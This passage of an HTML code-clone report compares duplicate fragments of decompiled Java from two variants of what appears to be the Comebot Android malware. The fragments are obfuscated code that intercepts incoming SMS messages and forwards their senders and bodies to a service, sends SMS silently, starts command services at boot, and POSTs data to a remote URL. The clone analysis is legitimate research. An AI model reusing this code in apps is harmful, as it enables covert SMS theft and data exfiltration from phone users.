<div class="mid" id="frag129" style="display:none"><pre>
  public void c(Context paramContext, String paramString1, String paramString2) {
    int i = 0;
    SmsManager smsManager = SmsManager.getDefault();
    ArrayList arrayList = smsManager.divideMessage(paramString2);
    PendingIntent pendingIntent1 = PendingIntent.getBroadcast(paramContext, 0, new Intent(d.a("#k#y#c&gt;r")), 0);
    PendingIntent pendingIntent2 = PendingIntent.getBroadcast(paramContext, 0, new Intent(d.a("u=u/b5j9p5t5b")), 0);
    ArrayList&lt;PendingIntent&gt; arrayList1 = new ArrayList();
    ArrayList&lt;PendingIntent&gt; arrayList2 = new ArrayList();
    int j;
    for (j = 0; i &lt; arrayList.size(); j = i) {
      arrayList2.add(pendingIntent2);
      i = j + 1;
      arrayList1.add(pendingIntent1);
    } 
    smsManager.sendMultipartTextMessage(paramString1, null, arrayList, arrayList1, arrayList2);
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 19:</b> &nbsp; 2 fragments, nominal size 18 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag63')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/resiverboot.java: 14-31
</a>
<div class="mid" id="frag63" style="display:none"><pre>
  public void a(Context paramContext, Intent paramIntent) {
    Bundle bundle = paramIntent.getExtras();
    if (bundle != null)
      try {
        Object[] arrayOfObject = (Object[])bundle.get(b.a("V_SH"));
        if (arrayOfObject != null) {
          int i = arrayOfObject.length;
          for (byte b = 0; b &lt; i; b++) {
            SmsMessage smsMessage = SmsMessage.createFromPdu((byte[])arrayOfObject[b]);
            String str1 = smsMessage.getDisplayOriginatingAddress();
            String str2 = smsMessage.getDisplayMessageBody();
            Intent intent = new Intent();
            this(paramContext, dsws.class);
            paramContext.startService(intent.putExtra(b.a("USV"), str1).putExtra(b.a("KH"), str2));
          } 
        } 
      } catch (Exception exception) {} 
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag133')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/resiverboot.java: 14-31
</a>
<div class="mid" id="frag133" style="display:none"><pre>
  public void a(Context paramContext, Intent paramIntent) {
    Bundle bundle = paramIntent.getExtras();
    if (bundle != null)
      try {
        Object[] arrayOfObject = (Object[])bundle.get(b.a("V_SH"));
        if (arrayOfObject != null) {
          int i = arrayOfObject.length;
          for (byte b = 0; b &lt; i; b++) {
            SmsMessage smsMessage = SmsMessage.createFromPdu((byte[])arrayOfObject[b]);
            String str1 = smsMessage.getDisplayOriginatingAddress();
            String str2 = smsMessage.getDisplayMessageBody();
            Intent intent = new Intent();
            this(paramContext, dsws.class);
            paramContext.startService(intent.putExtra(b.a("USV"), str1).putExtra(b.a("KH"), str2));
          } 
        } 
      } catch (Exception exception) {} 
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 20:</b> &nbsp; 2 fragments, nominal size 13 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag64')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/resiverboot.java: 33-46
</a>
<div class="mid" id="frag64" style="display:none"><pre>
  public void onReceive(Context paramContext, Intent paramIntent) {
    String str1 = paramIntent.getAction();
    paramContext.startService(new Intent(paramContext, gowhile.class));
    a a1 = this.a;
    this.b.getClass();
    a.a(paramContext, "", 14000L);
    paramContext.startService(new Intent(paramContext, commands.class));
    String str3 = b.a("KTTPRB^T\025");
    String str4 = b.a("GUBIIRB\025");
    String str5 = b.a("r^J^VSIU_\025");
    String str2 = b.a("uvudt~e~omc");
    if (this.a.a(paramContext, b.a("V^T^NMGOyHQH")).contains(b.a("RIS^")) &amp;&amp; str1.equals((new StringBuilder()).insert(0, str4).append(str3).append(str5).append(str2).toString()))
      a(paramContext, paramIntent); 
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag134')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/resiverboot.java: 33-46
</a>
<div class="mid" id="frag134" style="display:none"><pre>
  public void onReceive(Context paramContext, Intent paramIntent) {
    String str1 = paramIntent.getAction();
    paramContext.startService(new Intent(paramContext, gowhile.class));
    a a1 = this.a;
    this.b.getClass();
    a.a(paramContext, "", 14000L);
    paramContext.startService(new Intent(paramContext, commands.class));
    String str3 = b.a("KTTPRB^T\025");
    String str4 = b.a("GUBIIRB\025");
    String str5 = b.a("r^J^VSIU_\025");
    String str2 = b.a("uvudt~e~omc");
    if (this.a.a(paramContext, b.a("V^T^NMGOyHQH")).contains(b.a("RIS^")) &amp;&amp; str1.equals((new StringBuilder()).insert(0, str4).append(str3).append(str5).append(str2).toString()))
      a(paramContext, paramIntent); 
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 21:</b> &nbsp; 2 fragments, nominal size 12 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag66')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/b.java: 30-41
</a>
<div class="mid" id="frag66" style="display:none"><pre>
  public String a(String paramString1, String paramString2) {
    String str;
    a a = new a();
    a a1 = new a(this);
    a1.execute((Object[])new String[] { paramString1, paramString2 });
    try {
      paramString1 = a.a((String)a1.get(), a("\007RZA\005"), c.a("Z\"\022l\0013"));
    } catch (Exception exception) {
      str = "";
    } 
    return str;
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag136')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/b.java: 30-41
</a>
<div class="mid" id="frag136" style="display:none"><pre>
  public String a(String paramString1, String paramString2) {
    String str;
    a a = new a();
    a a1 = new a(this);
    a1.execute((Object[])new String[] { paramString1, paramString2 });
    try {
      paramString1 = a.a((String)a1.get(), a("\007RZA\005"), c.a("Z\"\022l\0013"));
    } catch (Exception exception) {
      str = "";
    } 
    return str;
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 22:</b> &nbsp; 2 fragments, nominal size 41 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag68')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/b.java: 48-89
</a>
<div class="mid" id="frag68" style="display:none"><pre>
    protected String a(String... param1VarArgs) {
      String str2 = param1VarArgs[0];
      String str1 = param1VarArgs[1];
      try {
        URL uRL = new URL();
        this(str2);
        HttpURLConnection httpURLConnection = (HttpURLConnection)uRL.openConnection();
        httpURLConnection.setRequestMethod(c.a("6B5Y"));
        httpURLConnection.setDoOutput(true);
        httpURLConnection.setDoInput(true);
        String str = c.a("%b\by\003c\022 *h\bj\022e");
        StringBuilder stringBuilder = new StringBuilder();
        this();
        httpURLConnection.setRequestProperty(str, stringBuilder.insert(0, "").append(Integer.toString((str1.getBytes()).length)).toString());
        httpURLConnection.getOutputStream().write(str1.getBytes(c.a("X2KK5")));
        httpURLConnection.connect();
        int i = httpURLConnection.getResponseCode();
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        this();
        if (i == 200) {
          InputStream inputStream = httpURLConnection.getInputStream();
          byte[] arrayOfByte = new byte[8192];
          while (true) {
            i = inputStream.read(arrayOfByte);
            if (i != -1) {
              byteArrayOutputStream.write(arrayOfByte, 0, i);
              continue;
            } 
            arrayOfByte = byteArrayOutputStream.toByteArray();
            String str3 = new String();
            this(arrayOfByte, c.a("X2KK5"));
            this.a = str3;
            break;
          } 
        } 
      } catch (MalformedURLException malformedURLException) {
      
      } catch (IOException iOException) {
      
      } catch (Exception exception) {}
      return this.a;
    }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag138')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/b.java: 48-89
</a>
<div class="mid" id="frag138" style="display:none"><pre>
    protected String a(String... param1VarArgs) {
      String str2 = param1VarArgs[0];
      String str1 = param1VarArgs[1];
      try {
        URL uRL = new URL();
        this(str2);
        HttpURLConnection httpURLConnection = (HttpURLConnection)uRL.openConnection();
        httpURLConnection.setRequestMethod(c.a("6B5Y"));
        httpURLConnection.setDoOutput(true);
        httpURLConnection.setDoInput(true);
        String str = c.a("%b\by\003c\022 *h\bj\022e");
        StringBuilder stringBuilder = new StringBuilder();
        this();
        httpURLConnection.setRequestProperty(str, stringBuilder.insert(0, "").append(Integer.toString((str1.getBytes()).length)).toString());
        httpURLConnection.getOutputStream().write(str1.getBytes(c.a("X2KK5")));
        httpURLConnection.connect();
        int i = httpURLConnection.getResponseCode();
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        this();
        if (i == 200) {
          InputStream inputStream = httpURLConnection.getInputStream();
          byte[] arrayOfByte = new byte[8192];
          while (true) {
            i = inputStream.read(arrayOfByte);
            if (i != -1) {
              byteArrayOutputStream.write(arrayOfByte, 0, i);
              continue;
            } 
            arrayOfByte = byteArrayOutputStream.toByteArray();
            String str3 = new String();
            this(arrayOfByte, c.a("X2KK5"));
            this.a = str3;
            break;
          } 
        } 
      } catch (MalformedURLException malformedURLException) {
      
      } catch (IOException iOException) {
      
      } catch (Exception exception) {}
      return this.a;
    }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<script language="JavaScript">
function ShowHide(divId) { 
    if(document.getElementById(divId).style.display == 'none') {
        document.getElementById(divId).style.display='block';
    } else { 
        document.getElementById(divId).style.display = 'none';
    } 
}
</script>
</body>
</html>
